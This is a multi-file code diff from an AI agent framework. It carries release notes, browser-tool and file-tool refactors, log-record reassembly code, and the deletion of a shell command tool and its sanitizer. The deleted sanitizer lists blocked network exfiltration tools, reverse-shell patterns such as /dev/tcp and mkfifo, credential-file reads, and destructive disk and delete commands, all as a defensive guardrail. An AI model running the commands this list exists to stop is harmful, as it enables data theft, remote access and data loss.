+- **Edit-file refactor** with a tighter API surface and ~560 lines of dead `test_file_ops_hashline.py` removed. (@RichardTang-Aden)
+- **Search + list-files consolidation** into one toolkit. (@RichardTang-Aden)
+- **Browser tools audit** — navigation, interactions, lifecycle, and tabs trimmed; `web_scrape` and browser-open merged. (@RichardTang-Aden)
+- **`shell_tools` package** replaces `execute_command_tool` with proper job control, PTY sessions, ring-buffered output, semantic exit codes, and destructive-command warnings. (@TimothyZhang7)
+- **Five new shell preset skills** plus reference docs (`exit_codes.md`, `find_predicates.md`, `ripgrep_cheatsheet.md`, `signals.md`). (@TimothyZhang7)
+- **Old lifecycle tools removed** — `queen_lifecycle_tools.py` lost ~900 lines. (@RichardTang-Aden)
+- **Autocompaction + concurrency tools updated** to play nicely with the new tool registry. (@RichardTang-Aden)
+- **Prompt simplification** — `nodes/__init__.py` dropped redundant `_queen_style` block and tightened phrasing across nodes. (@RichardTang-Aden)
+- **`ToolsEditor` grouping** — frontend tool-config screen now groups tools by category. (@RichardTang-Aden)
+
+### Conversation & Agent Experience
+
+- **`ask_user` questions surface in the chat transcript** instead of vanishing into a side panel, and the question bubble now defers until the user actually answers. (@bryan)
+- **New-session navigation with Queen warm-up UI** — new `queen-routing.tsx` page handles the warm-up so the user sees progress instead of a blank screen. (@bryan)
+- **Sync tool result contentful display** — tool results render as structured cards (charts, file diffs, etc.) instead of raw JSON. (@TimothyZhang7)
+
+### Vision Fallback
+
+- **Vision model retry + fallback** — non-vision models can now route image inputs through a captioning step instead of failing. (@RichardTang-Aden)
+- **Vision fallback with intent** — caption prompts incorporate the user's intent so the caption is task-relevant. (@RichardTang-Aden)
+- **Vision fallback auth** — fallback path now uses the right credentials per provider. (@RichardTang-Aden)
+- **Looser max-token cap** on vision fallback for models that spend output tokens on internal thinking. (@RichardTang-Aden)
+- **Vision fallback model usage logging** for cost visibility. (@RichardTang-Aden)
+
+### Colonies
+
+- **`POST /api/colonies/import`** — onboard a colony from a `tar` / `tar.gz` upload. 50 MB cap, manual path-traversal validation (Python 3.11 compatible), symlinks/hardlinks/devices rejected, mode bits masked. Tests cover happy path, name override, replace flag, traversal, absolute paths, and corrupt archives. (@RichardTang-Aden)
+- **Refactored colony routes** — `routes_colonies.py` gained ~450 lines of structure for import/export/list flows. (@TimothyZhang7)
+
+### MCP & Tools
+
+- **SimilarWeb V5 integration** — 29 new MCP tools covering traffic & engagement, competitor intelligence, keywords/SERP, audience demographics, and segment analysis. Includes credential spec, health checker, README, and tests on Ubuntu and Windows. (#7066)
+- **MCP registry initialization fix** — registry no longer races on first install. (@RichardTang-Aden)
+
+---
+
+## 🐛 Bug Fixes
+
+- **Initial install** path resolution — hardcoded `HIVE_HOME` references replaced; all agent paths now prefixed by the resolved `HIVE_HOME`. (@RichardTang-Aden)
+- **Frontend recovery** after a broken state on session reload. (@RichardTang-Aden)
+- **Compaction issues** when the agent loop runs into the buffer mid-stream. (@RichardTang-Aden)
+- **LiteLLM patch** for a streaming-usage edge case. (@RichardTang-Aden)
+- **`ask_user` question bubble** now defers until the user answers. (@bryan)
+- **Incubating-mode approval guidance** correctly injects into the prompt. (@RichardTang-Aden)
+- **LLM debugger** — fixed timeline order and tool-call display. (@RichardTang-Aden)
+- **Shell split-command** parsing fix. (@TimothyZhang7)
+- **Chart Y-axis** + **chart spec normalization** edge cases. (@TimothyZhang7)
+- **Scroll behavior** on certain element selectors. (@bryan)
+- **CI fixes**: skills `HIVE_HOME` refactor regressions, `run_parallel_workers` losing task text on spawn, `test_capabilities` deprecated model identifiers, `test_colony_runtime_overseer` Windows flake. (#7141, #7149)
+- **Orphan Zoho CRM test directory** removed under `src/` after the MCP refactor. (#7142)
+- **Credentials** — `EnvVarStorage.exists` now matches `load` semantics for empty values. (#5680)
+
+---
+
+## 🚀 Upgrading from v0.10.5
+
+No migration required. Pull `main` at `v0.11.0` and restart Hive — existing `~/.hive/` profiles, queens, colonies, and sessions keep working.
+
+A few things to know:
+
+1. **Queen's default tool surface changed.** If you have a queen profile pinned to a removed tool (e.g. `apply_diff`, `apply_patch`, `hashline_edit`, `grep_search`, the old `execute_command_tool`), it'll fall back to the consolidated replacements. Custom profiles referencing those tool names should be updated.
+2. **Old `queen_lifecycle_tools` entries are gone.** If you wired any external code against those defaults, switch to the new task system.
+3. **Task plan is now persistent.** Queen will start staging a plan automatically on new sessions — if you don't want the panel, you can collapse it from the layout.
+
+Plan the work. Chart the result. 🐝
@@ -334,7 +334,7 @@ Update incrementally — do not rewrite from scratch each time.

 **Background:** Replaces the older in-memory `_batch_ledger` (and `_working_notes → Current Plan` decomposition) — both were removed on 2026-04-15 because they duplicated state that belongs in SQLite. The queue, per-task `steps` decomposition, and `sop_checklist` hard-gates now all live in `progress.db` and are authoritative.

-**Protocol (injected into system prompt):** Workers receive `db_path` and `colony_id` (and optionally `task_id`) in their spawn message and interact with the ledger via `sqlite3` through `execute_command_tool`. The full claim → load plan → execute step → SOP-gate → mark done loop is documented in the skill's `SKILL.md`.
+**Protocol (injected into system prompt):** Workers receive `db_path` and `colony_id` (and optionally `task_id`) in their spawn message and interact with the ledger via `sqlite3` through `terminal_exec`. The full claim → load plan → execute step → SOP-gate → mark done loop is documented in the skill's `SKILL.md`.

 **Tables:**
 - `tasks` — queue: pending → claimed → done|failed, with `worker_id` and atomic claim tokens
@@ -17,16 +17,15 @@ map_search_gcu = NodeSpec(
 You are a browser agent. Your job: Search Google Maps for the provided query and extract business names and website URLs.

 ## Workflow
-1. browser_start
-2. browser_open(url="https://www.google.com/maps")
-3. use the url query to search for the keyword
-3.1 alternatively, use browser_type or browser_click to search for the "query" in memory.'
-4. browser_wait(seconds=3)
-5. browser_snapshot to find the list of results.
-6. For each relevant result, extract:
+1. browser_open(url="https://www.google.com/maps")  # lazy-creates the context
+2. use the url query to search for the keyword
+2.1 alternatively, use browser_type or browser_click to search for the "query" in memory.'
+3. browser_wait(seconds=3)
+4. browser_snapshot to find the list of results.
+5. For each relevant result, extract:
   - Name of the business
   - Website URL (look for the website icon/link)
-7. set_output("business_list", [{"name": "...", "website": "..."}, ...])
+6. set_output("business_list", [{"name": "...", "website": "..."}, ...])

 ## Constraints
 - Extract at least 5-10 businesses if possible.
@@ -24,13 +24,12 @@ Focus on:
 - Hardware/Silicon breakthroughs

 ## Instructions
-1. browser_start
-2. For each handle:
-   a. browser_open(url=f"https://x.com/{handle}")
+1. For each handle:
+   a. browser_open(url=f"https://x.com/{handle}")  # lazy-creates the context on first call
   b. browser_wait(seconds=5)
   c. browser_snapshot
   d. Parse relevant tech news text
-3. set_output("raw_tweets", consolidated_json)
+2. set_output("raw_tweets", consolidated_json)
 """,
 )

@@ -244,12 +244,14 @@ def main() -> None:
        logger.error("Failed to connect to GCU server: %s", e)
        sys.exit(1)

-    # Auto-start browser context so tools work immediately
+    # Warm the browser context so the first interactive call doesn't pay the
+    # cold-start round trip. about:blank lazy-creates the context just like
+    # a real URL would, without committing to a destination page.
    try:
-        result = client.call_tool("browser_start", {})
-        logger.info("browser_start: %s", result)
+        result = client.call_tool("browser_open", {"url": "about:blank"})
+        logger.info("browser_open(about:blank): %s", result)
    except Exception as e:
-        logger.warning("browser_start failed (may already be started): %s", e)
+        logger.warning("browser warm-up failed (may already be running): %s", e)

    app = create_app()

@@ -457,7 +457,7 @@ let currentView = 'grid';

 // Tool categories for sidebar grouping
 const CATEGORIES = {
-  'Lifecycle': ['browser_setup', 'browser_start', 'browser_stop', 'browser_status'],
+  'Lifecycle': ['browser_setup', 'browser_stop', 'browser_status'],
  'Tabs': ['browser_tabs', 'browser_open', 'browser_close', 'browser_close_all', 'browser_close_finished', 'browser_activate_tab'],
  'Navigation': ['browser_navigate', 'browser_go_back', 'browser_go_forward', 'browser_reload'],
  'Interactions': ['browser_click', 'browser_click_coordinate', 'browser_type', 'browser_type_focused', 'browser_press', 'browser_press_at', 'browser_hover', 'browser_hover_coordinate', 'browser_select', 'browser_scroll', 'browser_drag'],
@@ -64,6 +64,54 @@ def _format_timestamp(raw: str) -> str:
        return raw


+def _reassemble_records(records: list[dict[str, Any]]) -> list[dict[str, Any]]:
+    """Convert new-format (header + turn-delta) records into legacy-shape full turns.
+
+    Records lacking ``_kind`` are passed through unchanged. Inputs must be in
+    file order so headers precede the turns that reference them.
+    """
+    headers: dict[str, dict[str, Any]] = {}  # execution_id -> latest session_header
+    pools: dict[str, dict[str, dict[str, Any]]] = {}  # execution_id -> hash -> message body
+
+    out: list[dict[str, Any]] = []
+    for rec in records:
+        kind = rec.get("_kind")
+        if kind == "session_header":
+            eid = str(rec.get("execution_id") or "")
+            headers[eid] = rec
+            pools.setdefault(eid, {})
+            continue
+        if kind == "turn":
+            eid = str(rec.get("execution_id") or "")
+            pool = pools.setdefault(eid, {})
+            new_msgs = rec.get("new_messages") or {}
+            if isinstance(new_msgs, dict):
+                pool.update(new_msgs)
+            hashes = rec.get("message_hashes") or []
+            messages = [pool[h] for h in hashes if h in pool]
+            header = headers.get(eid, {})
+            out.append(
+                {
+                    "timestamp": rec.get("timestamp", ""),
+                    "execution_id": eid,
+                    "node_id": rec.get("node_id", ""),
+                    "stream_id": rec.get("stream_id", ""),
+                    "iteration": rec.get("iteration", 0),
+                    "system_prompt": header.get("system_prompt", ""),
+                    "tools": header.get("tools", []),
+                    "messages": messages,
+                    "assistant_text": rec.get("assistant_text", ""),
+                    "tool_calls": rec.get("tool_calls", []),
+                    "tool_results": rec.get("tool_results", []),
+                    "token_counts": rec.get("token_counts", {}),
+                    "_log_file": rec.get("_log_file", ""),
+                }
+            )
+            continue
+        out.append(rec)
+    return out
+
+
 def _is_test_session(execution_id: str, records: list[dict[str, Any]]) -> bool:
    if execution_id.startswith("<MagicMock"):
        return True
@@ -100,6 +148,9 @@ def _discover_session_summaries(logs_dir: Path, limit_files: int, include_tests:
                        payload = json.loads(line)
                    except json.JSONDecodeError:
                        continue
+                    # session_header is metadata, not a turn — don't count it.
+                    if payload.get("_kind") == "session_header":
+                        continue
                    eid = str(payload.get("execution_id") or "").strip()
                    if not eid:
                        continue
@@ -157,6 +208,10 @@ def _load_session_data(logs_dir: Path, session_id: str, limit_files: int) -> lis

    records: list[dict[str, Any]] = []
    for path in files:
+        # Reassemble per-file: each file is self-contained because the writer
+        # re-emits the session_header on every process start, so we never need
+        # cross-file state to fill in messages/system_prompt/tools.
+        file_records: list[dict[str, Any]] = []
        try:
            with path.open(encoding="utf-8") as handle:
                for line_number, raw_line in enumerate(handle, start=1):
@@ -166,17 +221,23 @@ def _load_session_data(logs_dir: Path, session_id: str, limit_files: int) -> lis
                    try:
                        payload = json.loads(line)
                    except json.JSONDecodeError:
-                        payload = {
-                            "timestamp": "",
-                            "execution_id": "",
-                            "_parse_error": f"{path.name}:{line_number}",
-                            "_raw_line": line,
-                        }
-                    if str(payload.get("execution_id") or "").strip() == session_id:
-                        payload["_log_file"] = str(path)
-                        records.append(payload)
+                        records.append(
+                            {
+                                "timestamp": "",
+                                "execution_id": "",
+                                "_parse_error": f"{path.name}:{line_number}",
+                                "_raw_line": line,
+                                "_log_file": str(path),
+                            }
+                        )
+                        continue
+                    if str(payload.get("execution_id") or "").strip() != session_id:
+                        continue
+                    payload["_log_file"] = str(path)
+                    file_records.append(payload)
        except OSError:
            continue
+        records.extend(_reassemble_records(file_records))

    if not records:
        return None
@@ -72,10 +72,7 @@ verbatim; system + credential paths are on a deny list).
 | `read_file` | Read file contents (with optional hashline anchors) |
 | `write_file` | Create or overwrite a file |
 | `edit_file` | Find/replace with fuzzy fallback |
-| `hashline_edit` | Anchor-based structural edits validated by line hashes |
-| `apply_patch` | Apply a diff_match_patch text |
 | `search_files` | Grep file contents (`target='content'`) or list/find files (`target='files'`) — replaces grep, find, and ls |
-| `execute_command_tool` | Execute shell commands |
 | `save_data` / `load_data` | Persist and retrieve structured data across steps |
 | `serve_file_to_user` | Serve a file for the user to download |
 | `list_data_files` | List persisted data files in the session |
@@ -176,11 +173,8 @@ tools/
 │   ├── file_ops.py          # ALL file tools (read, write, edit, hashline_edit, search_files, apply_patch)
 │   ├── credentials/         # Credential management
 │   └── tools/               # Tool implementations
-│       ├── example_tool/
-│       ├── file_system_toolkits/  # Shell only — file tools moved to file_ops.py
-│       │   ├── security.py
-│       │   ├── command_sanitizer.py
-│       │   └── execute_command_tool/
+│       ├── file_system_toolkits/  # Sandbox path helpers (security.py)
+│       │   └── security.py
 │       ├── web_search_tool/
 │       ├── web_scrape_tool/
 │       ├── pdf_read_tool/
@@ -61,7 +61,7 @@ All replies carry `{ id, result }` or `{ id, error }`.
 # 1. At GCU server startup, open ws://localhost:9229/beeline and wait for
 #    the extension to connect (sends { type: "hello" }).
 #
-# 2. On browser_start(profile):
+# 2. On the first browser tool call for a profile (lazy-start via _ensure_context):
 #    - Send { id, type: "context.create", agentId: profile }
 #    - Receive { groupId, tabId }
 #    - Store groupId in the session object (no Chrome process, no CDP port)
@@ -22,13 +22,11 @@ Usage:

 from __future__ import annotations

-import contextlib
 import difflib
 import fnmatch
 import os
 import re
 import subprocess
-import sys
 import threading as _threading
 from collections.abc import Callable
 from dataclasses import dataclass, field
@@ -924,8 +922,7 @@ def _apply_hunk(content: str, hunk: _Hunk) -> tuple[str, str | None]:
            count = content.count(hunk.context_hint)
            if count > 1:
                return content, (
-                    f"addition-only hunk: context hint "
-                    f"'{hunk.context_hint}' is ambiguous ({count} occurrences)"
+                    f"addition-only hunk: context hint '{hunk.context_hint}' is ambiguous ({count} occurrences)"
                )
            if count == 1:
                idx = content.find(hunk.context_hint)
@@ -1045,9 +1042,7 @@ def _apply_v4a(
            for hunk_idx, hunk in enumerate(op.hunks):
                new_content, herr = _apply_hunk(content, hunk)
                if herr:
-                    errors.append(
-                        f"Op #{op_idx + 1} update {op.path} hunk #{hunk_idx + 1}: {herr}"
-                    )
+                    errors.append(f"Op #{op_idx + 1} update {op.path} hunk #{hunk_idx + 1}: {herr}")
                    break
                content = new_content
            fs_state[resolved] = content
@@ -1063,9 +1058,7 @@ def _apply_v4a(
                errors.append(f"Op #{op_idx + 1} move {op.path}: {err}")
                continue
            if os.path.exists(dst_resolved) and fs_exists.get(dst_resolved, True):
-                errors.append(
-                    f"Op #{op_idx + 1} move {op.path}: destination already exists"
-                )
+                errors.append(f"Op #{op_idx + 1} move {op.path}: destination already exists")
                continue
            fs_state[dst_resolved] = fs_state[resolved]
            fs_exists[dst_resolved] = True
@@ -1121,8 +1114,7 @@ def _apply_v4a(

    if apply_errors:
        return None, (
-            "Apply phase failed (state may be inconsistent — run `git diff` to assess):\n  "
-            + "\n  ".join(apply_errors)
+            "Apply phase failed (state may be inconsistent — run `git diff` to assess):\n  " + "\n  ".join(apply_errors)
        )

    summary_parts: list[str] = []
@@ -1177,10 +1169,7 @@ def _patch_replace(
            f"harness can track its state before you edit it."
        )
    if _fresh.status is Freshness.STALE:
-        return (
-            f"Refusing to edit '{path}': {_fresh.detail}. Re-read the file with "
-            f"read_file before editing."
-        )
+        return f"Refusing to edit '{path}': {_fresh.detail}. Re-read the file with read_file before editing."

    try:
        with open(resolved, encoding="utf-8") as f:
@@ -1217,9 +1206,7 @@ def _patch_replace(
                break

        if matched is None:
-            close = difflib.get_close_matches(
-                old_string[:200], content.split("\n"), n=3, cutoff=0.4
-            )
+            close = difflib.get_close_matches(old_string[:200], content.split("\n"), n=3, cutoff=0.4)
            msg = (
                f"Error: Could not find a unique match for old_string in {path}. "
                f"Use read_file to verify the current content, or search_files "
@@ -1352,14 +1339,8 @@ EDIT_FILE_PARAMS = {
        "tabs vs spaces, smart quotes vs ASCII, and literal \\n/\\t/\\r "
        "vs real control chars."
    ),
-    "new_string": (
-        "Replace mode only. Replacement text. Pass an empty string to "
-        "delete the matched text."
-    ),
-    "replace_all": (
-        "Replace mode only. Replace every occurrence instead of requiring "
-        "a unique match. Default False."
-    ),
+    "new_string": ("Replace mode only. Replacement text. Pass an empty string to delete the matched text."),
+    "replace_all": ("Replace mode only. Replace every occurrence instead of requiring a unique match. Default False."),
    "patch_text": (
        "Patch mode only. Structured patch body. File paths are embedded "
        "inside the body via '*** Update File: <path>' / "
@@ -1396,18 +1377,14 @@ SEARCH_FILES_DOC = (
 )
 SEARCH_FILES_PARAMS = {
    "pattern": (
-        "Regex (content mode) or glob (files mode, e.g. '*.py'). For an "
-        "'ls'-style listing pass '*' or '*.<ext>'."
+        "Regex (content mode) or glob (files mode, e.g. '*.py'). For an 'ls'-style listing pass '*' or '*.<ext>'."
    ),
    "target": (
        "'content' to grep inside files, 'files' to list/find files. "
        "Legacy aliases: 'grep' -> 'content', 'find'/'ls' -> 'files'. "
        "Default 'content'."
    ),
-    "path": (
-        "Directory (or, in content mode, a single file) to search. "
-        "Default '.'."
-    ),
+    "path": ("Directory (or, in content mode, a single file) to search. Default '.'."),
    "file_glob": (
        "Restrict content search to filenames matching this glob. "
        "Ignored in files mode (use the 'pattern' argument instead)."
@@ -1419,14 +1396,8 @@ SEARCH_FILES_PARAMS = {
        "default), 'files_only' (paths only), 'count' (per-file match "
        "counts)."
    ),
-    "context": (
-        "Lines of context before and after each match (content mode "
-        "only). Default 0."
-    ),
-    "hashline": (
-        "Content mode: include N:hhhh hash anchors in matched lines. "
-        "Default False."
-    ),
+    "context": ("Lines of context before and after each match (content mode only). Default 0."),
+    "hashline": ("Content mode: include N:hhhh hash anchors in matched lines. Default False."),
    "task_id": (
        "Optional anti-loop scope key. Defaults to a shared bucket; pass "
        "a per-task id when multiple agents share a process."
@@ -1719,4 +1690,3 @@ def register_file_tools(
                "Results have not changed — use what you have instead of re-searching.]"
            )
        return result
-
@@ -59,11 +59,7 @@ from .docker_hub_tool import register_tools as register_docker_hub
 from .duckduckgo_tool import register_tools as register_duckduckgo
 from .email_tool import register_tools as register_email
 from .exa_search_tool import register_tools as register_exa_search
-from .example_tool import register_tools as register_example
 from .excel_tool import register_tools as register_excel
-from .file_system_toolkits.execute_command_tool import (
-    register_tools as register_execute_command,
-)
 from .freshdesk_tool import register_tools as register_freshdesk
 from .github_tool import register_tools as register_github
 from .gitlab_tool import register_tools as register_gitlab
@@ -157,7 +153,6 @@ def _register_verified(
    """Register verified (stable) tools."""
    _verified_before = set(mcp._tool_manager._tools.keys())
    # --- No credentials ---
-    register_example(mcp)
    if register_web_scrape:
        register_web_scrape(mcp)
    register_pdf_read(mcp)
@@ -199,7 +194,6 @@ def _register_verified(
    # defaults to CWD here; framework callers that own a session-specific
    # workspace should call register_file_tools directly with home set.
    register_file_tools(mcp)
-    register_execute_command(mcp)
    register_csv(mcp)
    register_excel(mcp)

@@ -1,26 +0,0 @@
-# Example Tool
-
-A template tool demonstrating the Aden tools pattern.
-
-## Description
-
-This tool processes text messages with optional transformations. It serves as a reference implementation for creating new tools using the FastMCP decorator pattern.
-
-## Arguments
-
-| Argument | Type | Required | Default | Description |
-|----------|------|----------|---------|-------------|
-| `message` | str | Yes | - | The message to process (1-1000 chars) |
-| `uppercase` | bool | No | `False` | Convert message to uppercase |
-| `repeat` | int | No | `1` | Number of times to repeat (1-10) |
-
-## Environment Variables
-
-This tool does not require any environment variables.
-
-## Error Handling
-
-Returns error strings for validation issues:
- `Error: message must be 1-1000 characters` - Empty or too long message
- `Error: repeat must be 1-10` - Repeat value out of range
- `Error processing message: <error>` - Unexpected error
@@ -1,5 +0,0 @@
-"""Example Tool package."""
-
-from .example_tool import register_tools
-
-__all__ = ["register_tools"]
@@ -1,52 +0,0 @@
-"""
-Example Tool - A simple text processing tool for FastMCP.
-
-Demonstrates native FastMCP tool registration pattern.
-"""
-
-from __future__ import annotations
-
-from fastmcp import FastMCP
-
-
-def register_tools(mcp: FastMCP) -> None:
-    """Register example tools with the MCP server."""
-
-    @mcp.tool()
-    def example_tool(
-        message: str,
-        uppercase: bool = False,
-        repeat: int = 1,
-    ) -> str:
-        """
-        A simple example tool that processes text messages.
-        Use this tool when you need to transform or repeat text.
-
-        Args:
-            message: The message to process (1-1000 chars)
-            uppercase: If True, convert the message to uppercase
-            repeat: Number of times to repeat the message (1-10)
-
-        Returns:
-            The processed message string
-        """
-        try:
-            # Validate inputs
-            if not message or len(message) > 1000:
-                return "Error: message must be 1-1000 characters"
-            if repeat < 1 or repeat > 10:
-                return "Error: repeat must be 1-10"
-
-            # Process the message
-            result = message
-            if uppercase:
-                result = result.upper()
-
-            # Repeat if requested
-            if repeat > 1:
-                result = " ".join([result] * repeat)
-
-            return result
-
-        except Exception as e:
-            return f"Error processing message: {str(e)}"
@@ -1,16 +1,15 @@
 # File System Toolkits (post-consolidation)

-This package now contains only the shell tool. **All file tools live in
-`aden_tools.file_ops`** (read_file, write_file, edit_file, hashline_edit,
-search_files, apply_patch) — they share one path policy and one home dir.
+This package contains only sandbox path helpers used by `csv_tool` and
+`excel_tool`. **All file tools live in `aden_tools.file_ops`** (read_file,
+write_file, edit_file, hashline_edit, search_files, apply_patch) — they
+share one path policy and one home dir.

 ## Sub-modules

 | Module | Description |
 |--------|-------------|
-| `execute_command_tool/` | Shell command execution with sanitization (run_command, bash_kill, bash_output) |
-| `command_sanitizer.py` | Validates and sanitizes shell command strings |
-| `security.py` | Sandbox path resolver still used by execute_command_tool |
+| `security.py` | Sandbox path resolver used by csv_tool and excel_tool |

 ## File tools

@@ -31,11 +30,3 @@ from aden_tools.file_ops import register_file_tools

 register_file_tools(mcp, home="/path/to/agent/home")
 ```
-
-For shell:
-
-```python
-from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools as register_shell
-
-register_shell(mcp)
-```
@@ -1,202 +0,0 @@
-"""Command sanitization to prevent shell injection attacks.
-
-Validates commands against a blocklist of dangerous patterns before they
-are passed to subprocess.run(shell=True). This prevents prompt injection
-attacks from tricking AI agents into running destructive or exfiltration
-commands on the host system.
-
-Design: uses a blocklist (not allowlist) so agents can run arbitrary
-dev commands (uv, pytest, git, etc.) while blocking known-dangerous ops.
-This blocks explicit nested shell executables (bash, sh, pwsh, etc.),
-but callers still execute via shell=True, so shell parsing remains a
-known limitation of this guardrail.
-"""
-
-import re
-
-__all__ = ["CommandBlockedError", "validate_command"]
-
-
-class CommandBlockedError(Exception):
-    """Raised when a command is blocked by the safety filter."""
-
-    pass
-
-
-# ---------------------------------------------------------------------------
-# Blocklists
-# ---------------------------------------------------------------------------
-
-# Executables / prefixes that are never safe for an AI agent to invoke.
-# Matched against each segment of a compound command (split on ; | && ||).
-_BLOCKED_EXECUTABLES: list[str] = [
-    # Network exfiltration
-    "wget",
-    "nc",
-    "ncat",
-    "netcat",
-    "nmap",
-    "ssh",
-    "scp",
-    "sftp",
-    "ftp",
-    "telnet",
-    "rsync",
-    # Windows network tools
-    "invoke-webrequest",
-    "invoke-restmethod",
-    "iwr",
-    "irm",
-    "certutil",
-    # User / privilege escalation
-    "useradd",
-    "userdel",
-    "usermod",
-    "adduser",
-    "deluser",
-    "passwd",
-    "chpasswd",
-    "visudo",
-    "net",  # net user, net localgroup, etc.
-    # System destructive
-    "shutdown",
-    "reboot",
-    "halt",
-    "poweroff",
-    "init",
-    "systemctl",
-    "mkfs",
-    "fdisk",
-    "diskpart",
-    "format",  # Windows format
-    # Reverse shell / code exec wrappers
-    "bash",
-    "sh",
-    "zsh",
-    "dash",
-    "csh",
-    "ksh",
-    "powershell",
-    "pwsh",
-    "cmd",
-    "cmd.exe",
-    "wscript",
-    "cscript",
-    "mshta",
-    "regsvr32",
-    # Credential / secret access
-    "security",  # macOS keychain: security find-generic-password
-]
-
-# Patterns matched against the full (joined) command string.
-# These catch dangerous flags and argument combos even when the
-# executable itself isn't blocked (e.g. python -c '...').
-_BLOCKED_PATTERNS: list[re.Pattern[str]] = [
-    # rm with force/recursive flags targeting root or broad paths
-    re.compile(r"\brm\s+(-[rRf]+\s+)*(/|~|\.\.|C:\\)", re.IGNORECASE),
-    # del /s /q (Windows recursive delete)
-    re.compile(r"\bdel\s+.*/[sS]", re.IGNORECASE),
-    re.compile(r"\brmdir\s+/[sS]", re.IGNORECASE),
-    # dd writing to disks/partitions
-    re.compile(r"\bdd\s+.*\bof=\s*/dev/", re.IGNORECASE),
-    # chmod 777 / chmod -R 777
-    re.compile(r"\bchmod\s+(-R\s+)?(777|666)\b", re.IGNORECASE),
-    # sudo — agents should never escalate privileges
-    re.compile(r"\bsudo\b", re.IGNORECASE),
-    # su — switch user
-    re.compile(r"\bsu\s+", re.IGNORECASE),
-    # ruby/perl with -e flag (inline code execution)
-    re.compile(r"\bruby\s+-e\b", re.IGNORECASE),
-    re.compile(r"\bperl\s+-e\b", re.IGNORECASE),
-    # powershell encoded commands
-    re.compile(r"\bpowershell\b.*-enc", re.IGNORECASE),
-    # Reverse shell patterns
-    re.compile(r"/dev/tcp/", re.IGNORECASE),
-    re.compile(r"\bmkfifo\b", re.IGNORECASE),
-    # eval / exec as standalone commands
-    re.compile(r"^\s*eval\s+", re.IGNORECASE | re.MULTILINE),
-    re.compile(r"^\s*exec\s+", re.IGNORECASE | re.MULTILINE),
-    # Reading well-known secret files
-    re.compile(r"\bcat\s+.*(\.ssh|/etc/shadow|/etc/passwd|credential_key)", re.IGNORECASE),
-    re.compile(r"\btype\s+.*credential_key", re.IGNORECASE),
-    # Backtick or $() command substitution containing blocked executables
-    re.compile(r"\$\(.*\b(wget|nc|ncat)\b.*\)", re.IGNORECASE),
-    re.compile(r"`.*\b(wget|nc|ncat)\b.*`", re.IGNORECASE),
-    # Environment variable exfiltration via echo/print
-    re.compile(r"\becho\s+.*\$\{?.*(API_KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL)", re.IGNORECASE),
-    # >& /dev/tcp (bash reverse shell)
-    re.compile(r">&\s*/dev/tcp", re.IGNORECASE),
-]
-
-# Shell operators used to split compound commands.
-# We check each segment individually against _BLOCKED_EXECUTABLES.
-_SHELL_SPLIT_PATTERN = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
-
-
-def _normalize_executable_name(token: str) -> str:
-    """Normalize executable names for matching (e.g. cmd.exe -> cmd)."""
-    normalized = token.lower().strip("\"'")
-    normalized = re.split(r"[\\/]", normalized)[-1]
-    if normalized.endswith(".exe"):
-        return normalized[:-4]
-    return normalized
-
-
-def _extract_executable(segment: str) -> str:
-    """Extract the first token (executable) from a command segment.
-
-    Strips environment variable assignments (FOO=bar) from the front.
-    """
-    segment = segment.strip()
-    # Skip env var assignments at the start: VAR=value cmd ...
-    tokens = segment.split()
-    for token in tokens:
-        if "=" in token and not token.startswith("-"):
-            continue
-        # Return lowercase for case-insensitive matching
-        return _normalize_executable_name(token)
-    return ""
-
-
-def validate_command(command: str) -> None:
-    """Validate a command string against the safety blocklists.
-
-    Args:
-        command: The shell command string to validate.
-
-    Raises:
-        CommandBlockedError: If the command matches any blocked pattern.
-    """
-    if not command or not command.strip():
-        return
-
-    stripped = command.strip()
-
-    # --- Check full-command patterns ---
-    for pattern in _BLOCKED_PATTERNS:
-        match = pattern.search(stripped)
-        if match:
-            raise CommandBlockedError(
-                f"Command blocked for safety: matched dangerous pattern '{match.group()}'. "
-                f"If this is a false positive, please modify the command."
-            )
-
-    # --- Check each segment for blocked executables ---
-    segments = _SHELL_SPLIT_PATTERN.split(stripped)
-    for segment in segments:
-        segment = segment.strip()
-        if not segment:
-            continue
-
-        executable = _extract_executable(segment)
-        # Check exact match and prefix-before-dot (e.g. mkfs.ext4 -> mkfs)
-        names_to_check = {executable}
-        if "." in executable:
-            names_to_check.add(executable.split(".")[0])
-        if names_to_check & set(_BLOCKED_EXECUTABLES):
-            matched = (names_to_check & set(_BLOCKED_EXECUTABLES)).pop()
-            raise CommandBlockedError(
-                f"Command blocked for safety: '{matched}' is not allowed. "
-                f"Blocked categories: network tools, privilege escalation, "
-                f"system destructive commands, shell interpreters."
-            )
@@ -1,152 +0,0 @@
-# Execute Command Tool
-
-Executes shell commands within the secure session sandbox.
-
-## Description
-
-The `execute_command_tool` allows you to run arbitrary shell commands in a sandboxed environment. Commands are executed with a 60-second timeout and capture both stdout and stderr output.
-
-## Use Cases
-
- Running build commands (npm build, make, etc.)
- Executing tests
- Running linters or formatters
- Performing git operations
- Installing dependencies
-
-## Usage
-
-```python
-execute_command_tool(
-    command="npm install",
-    workspace_id="workspace-123",
-    agent_id="agent-456",
-    session_id="session-789",
-    cwd="project"
-)
-```
-
-## Arguments
-
-| Argument | Type | Required | Default | Description |
-|----------|------|----------|---------|-------------|
-| `command` | str | Yes | - | The shell command to execute |
-| `workspace_id` | str | Yes | - | The ID of the workspace |
-| `agent_id` | str | Yes | - | The ID of the agent |
-| `session_id` | str | Yes | - | The ID of the current session |
-| `cwd` | str | No | "." | The working directory for the command (relative to session root) |
-
-## Returns
-
-Returns a dictionary with the following structure:
-
-**Success:**
-```python
-{
-    "success": True,
-    "command": "npm install",
-    "return_code": 0,
-    "stdout": "added 42 packages in 3s",
-    "stderr": "",
-    "cwd": "project"
-}
-```
-
-**Command failure (non-zero exit):**
-```python
-{
-    "success": True,  # Command executed successfully, but exited with error code
-    "command": "npm test",
-    "return_code": 1,
-    "stdout": "",
-    "stderr": "Error: Tests failed",
-    "cwd": "."
-}
-```
-
-**Timeout:**
-```python
-{
-    "error": "Command timed out after 60 seconds"
-}
-```
-
-**Error:**
-```python
-{
-    "error": "Failed to execute command: [error message]"
-}
-```
-
-## Error Handling
-
- Returns an error dict if the command times out (60 second limit)
- Returns an error dict if the command cannot be executed
- Returns success with non-zero return_code if command runs but fails
- Commands are executed in a sandboxed session environment
- Working directory defaults to session root if not specified
-
-## Security Considerations
-
- Commands are executed within the session sandbox only
- File access is restricted to the session directory
- Network access depends on sandbox configuration
- Commands run with the permissions of the session user
- Use with caution as shell injection is possible
-
-## Examples
-
-### Running a build command
-```python
-result = execute_command_tool(
